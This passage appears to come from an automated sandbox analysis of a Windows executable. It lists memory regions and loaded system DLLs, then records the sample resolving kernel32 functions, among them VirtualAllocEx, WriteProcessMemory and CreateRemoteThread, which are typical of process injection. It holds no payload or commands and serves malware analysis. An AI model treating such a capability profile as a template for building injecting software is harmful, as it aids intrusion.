(normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 3056 start_va = 0x756d0000 end_va = 0x756dcfff entry_point = 0x756d0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 3057 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3058 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3059 start_va = 0x756a0000 end_va = 0x756a5fff entry_point = 0x756a0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 3060 start_va = 0x75310000 end_va = 0x7531ffff entry_point = 0x75310000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 3061 start_va = 0x2c40000 end_va = 0x2deffff entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 3062 start_va = 0x2c40000 end_va = 0x2ceffff entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 3063 start_va = 0x2de0000 end_va = 0x2deffff entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 3064 start_va = 0x2cf0000 end_va = 0x2d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 3065 start_va = 0x2c50000 end_va = 0x2c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 3066 start_va = 0x2ce0000 end_va = 0x2ceffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 3067 start_va = 0x2d50000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 3068 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 3069 start_va = 0x75300000 end_va = 0x75305fff entry_point = 0x75300000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 3070 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3071 start_va = 0x2ba0000 end_va = 0x2bdffff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 3072 start_va = 0x2ca0000 end_va = 0x2cdffff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 3073 start_va = 0x76020000 end_va = 0x760a2fff entry_point = 0x76020000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3074 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 3075 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3076 start_va = 0x752a0000 end_va = 0x752f9fff entry_point = 0x752a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 3077 start_va = 0x75290000 end_va = 0x7529dfff entry_point = 0x75290000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 3078 start_va = 0x920000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 3079 start_va = 0x26a0000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 3080 start_va = 0x75280000 end_va = 0x75287fff entry_point = 0x75280000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 3081 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 3213 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3214 start_va = 0x75270000 end_va = 0x75278fff entry_point = 0x75270000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3215 start_va = 0x2df0000 end_va = 0x3132fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 3216 start_va = 0x75230000 end_va = 0x7526bfff entry_point = 0x75230000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3217 start_va = 0x3140000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 3218 start_va = 0x75220000 end_va = 0x75224fff entry_point = 0x75220000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 3219 start_va = 0x75210000 end_va = 0x75215fff entry_point = 0x75210000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 3220 start_va = 0x751d0000 end_va = 0x75207fff entry_point = 0x751d0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 3221 start_va = 0x3140000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 3222 start_va = 0x32e0000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 3223 start_va = 0x3160000 end_va = 0x319ffff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 3224 start_va = 0x31f0000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 3225 start_va = 0x3230000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 3226 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 3227 start_va = 0x751c0000 end_va = 0x751c7fff entry_point = 0x751c0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 3228 start_va = 0x75180000 end_va = 0x751b7fff entry_point = 0x75180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 3229 start_va = 0x75160000 end_va = 0x75176fff entry_point = 0x75160000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3230 start_va = 0x75120000 end_va = 0x7515cfff entry_point = 0x75120000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3231 start_va = 0x75100000 end_va = 0x75115fff entry_point = 0x75100000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 3232 start_va = 0x750e0000 end_va = 0x750fbfff entry_point = 0x750e0000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\SysWOW64\\cryptnet.dll" (normalized: "c:\\windows\\syswow64\\cryptnet.dll") Region: id = 3233 start_va = 0x763d0000 end_va = 0x7656cfff entry_point = 0x763d0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 3234 start_va = 0x75890000 end_va = 0x758b6fff entry_point = 0x75890000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3235 start_va = 0x75870000 end_va = 0x75881fff entry_point = 0x75870000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 3236 start_va = 0x750c0000 end_va = 0x750d4fff entry_point = 0x750c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 3237 start_va = 0x750b0000 end_va = 0x750bdfff entry_point = 0x750b0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\SysWOW64\\devrtl.dll" (normalized: "c:\\windows\\syswow64\\devrtl.dll") Region: id = 3238 start_va = 0x3320000 end_va = 0x341ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 3239 start_va = 0x763d0000 end_va = 0x7656cfff entry_point = 0x763d0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 3240 start_va = 0x75890000 end_va = 0x758b6fff entry_point = 0x75890000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3241 start_va = 0x75870000 end_va = 0x75881fff entry_point = 0x75870000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 3242 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x330000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 3243 start_va = 0x763d0000 end_va = 0x7656cfff entry_point = 0x763d0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 3244 start_va = 0x75890000 end_va = 0x758b6fff entry_point = 0x75890000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3245 start_va = 0x75870000 end_va = 0x75881fff entry_point = 0x75870000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 3246 start_va = 0x2ae0000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 3247 start_va = 0x2d00000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 3248 start_va = 0x2da0000 end_va = 0x2ddffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 3249 start_va = 0x3470000 end_va = 0x34affff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 3250 start_va = 0x3540000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 3251 start_va = 0x3590000 end_va = 0x35cffff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 3252 start_va = 0x75000000 end_va = 0x7504efff entry_point = 0x75000000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 3253 start_va = 0x75050000 end_va = 0x750a7fff entry_point = 0x75050000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3254 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3255 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 3256 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 3257 start_va = 0x35d0000 end_va = 0x368ffff entry_point = 0x35d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3258 start_va = 0x74ff0000 end_va = 0x74ffcfff entry_point = 0x74ff0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 3259 start_va = 0x74fd0000 end_va = 0x74fe1fff entry_point = 0x74fd0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 3260 start_va = 0x75890000 end_va = 0x758b6fff entry_point = 0x75890000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3261 start_va = 0x240000 end_va = 0x240fff entry_point = 0x240000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 3262 start_va = 0x2d0000 end_va = 0x2e0fff entry_point = 0x2d0000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 3263 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3264 start_va = 0x240000 end_va = 0x240fff entry_point = 0x240000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 3265 start_va = 0x741b0000 end_va = 0x7422ffff entry_point = 0x741b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3266 start_va = 0x3690000 end_va = 0x378ffff entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 3267 start_va = 0x74fc0000 end_va = 0x74fc9fff entry_point = 0x74fc0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3268 start_va = 0x74f60000 end_va = 0x74fbbfff entry_point = 0x74f60000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3269 start_va = 0x3790000 end_va = 0x38effff entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3270 start_va = 0x74f50000 end_va = 0x74f5efff entry_point = 0x74f50000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3546 start_va = 0x74eb0000 end_va = 0x74f45fff entry_point = 0x74eb0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3547 start_va = 0x74e90000 end_va = 0x74ea7fff entry_point = 0x74e90000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 3548 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3550 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x3b0000 region_type = mapped_file name = "winhttp.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winhttp.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winhttp.dll.mui") Region: id = 3551 start_va = 0x32a0000 end_va = 0x32dffff entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 3552 start_va = 0x37d0000 end_va = 0x380ffff entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 3553 start_va = 0x38b0000 end_va = 0x38effff entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 3554 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3555 start_va = 0x763d0000 end_va = 0x7656cfff entry_point = 0x763d0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 3556 start_va = 0x75870000 end_va = 0x75881fff entry_point = 0x75870000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 3557 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3559 start_va = 0x8a0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 3560 start_va = 0x3470000 end_va = 0x34affff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 3561 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 3562 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3563 start_va = 0x38f0000 end_va = 0x39effff entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 3564 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3636 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3638 start_va = 0x39f0000 end_va = 0x3beffff entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 3639 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3721 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3723 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3725 start_va = 0x240000 end_va = 0x24bfff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Thread: id = 205 os_tid = 0x7c4 Thread: id = 206 os_tid = 0x11c [0312.905] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateThread") returned 0x759d7a2f [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="GetNativeSystemInfo") returned 0x759e10b5 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="CreateThread") returned 0x759d34d5 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteCriticalSection") returned 0x77ce45f5 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="GetComputerNameW") returned 0x759ddd0e [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="SystemTimeToFileTime") returned 0x759d5a7e [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalMemoryStatusEx") returned 0x759fd4c4 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="CreateProcessW") returned 0x759d103d [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedIncrement") returned 0x759d1400 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFreeEx") returned 0x759ed9c8 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="IsBadReadPtr") returned 0x759fd075 [0312.906] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="OpenMutexW") returned 0x759d5151 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="SetEndOfFile") returned 0x759ece2e [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentThread") returned 0x759d17ec [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="FlushFileBuffers") returned 0x759d469b [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x77d25f41 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcess") returned 0x759d1809 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="DuplicateHandle") returned 0x759d1886 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleA") returned 0x759d1245 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="AddVectoredExceptionHandler") returned 0x77d2742b [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="ExitProcess") returned 0x759d7a10 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcessId") returned 0x759d11f8 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileW") returned 0x759f830d [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="IsWow64Process") returned 0x759d195e [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstChangeNotificationW") returned 0x759ed851 [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextChangeNotification") returned 0x759f5c1e [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessInJob") returned 0x759fc7ea [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="CreateRemoteThread") returned 0x75a5416b [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="CreateNamedPipeW") returned 0x75a5414b [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="DisconnectNamedPipe") returned 0x75a541df [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="ConnectNamedPipe") returned 0x75a540fb [0312.907] GetProcAddress (hModule=0x759c0000, lpProcName="GetLogicalDrives") returned 0x759d5371 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetDriveTypeW") returned 0x759d418b [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetUserDefaultUILanguage") returned 0x759d44ab [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetEnvironmentVariableW") returned 0x759d1b48 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointer") returned 0x759d17d1 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="InitializeCriticalSection") returned 0x77ce2c42 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetTimeZoneInformation") returned 0x759d465a [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x759e052f [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="OpenProcess") returned 0x759d1986 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileTime") returned 0x759d4407 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="ReleaseMutex") returned 0x759d111e [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="LeaveCriticalSection") returned 0x77cd2270 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleFileNameW") returned 0x759d4950 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileTime") returned 0x759eecbb [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0312.908] GetProcAddress (hModule=0x759c0000, lpProcName="EnterCriticalSection") returned 0x77cd22b0 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="OpenEventW") returned 0x759d15d6 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="WriteProcessMemory") returned 0x759ed9e0 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedExchange") returned 0x759d1462 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeInformationW") returned 0x759ec860 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="CreateDirectoryW") returned 0x759d4259 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleW") returned 0x759d34b0 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="Process32FirstW") returned 0x759f8baf [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="Process32NextW") returned 0x759f896c [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="GetLastError") returned 0x759d11c0 [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="CreateToolhelp32Snapshot") returned 0x759f735f [0312.909] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="CreateMutexW") returned 0x759d424c [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="ResetEvent") returned 0x759d16dd [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="SetEvent") returned 0x759d16c5 [0312.910] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0312.910] 